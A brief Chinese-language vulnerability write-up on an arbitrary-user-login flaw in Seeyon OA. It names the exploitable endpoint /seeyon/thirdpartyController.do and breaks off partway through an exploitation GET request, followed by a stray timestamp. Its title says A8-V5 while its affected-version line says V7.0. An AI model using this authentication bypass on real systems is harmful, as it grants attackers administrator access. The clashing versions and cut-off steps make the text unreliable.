致远OA A8-V5 任意用户登录漏洞分析
# 致远OA A8-V5 任意用户登录漏洞分析报告
## 漏洞概述
致远OA A8-V5版本存在一个严重的任意用户登录漏洞,攻击者可以通过构造特定的请求绕过认证机制,直接获取系统管理员权限。
## 漏洞环境
- 受影响版本:致远A8 V7.0
## 漏洞利用
### 利用接口
```
/seeyon/thirdpartyController.do
```
### 利用方法
1. 构造GET请求访问漏洞接口:
```http
GET /seeyon/thirdpartyCont
2025-08-23 16:42:34
0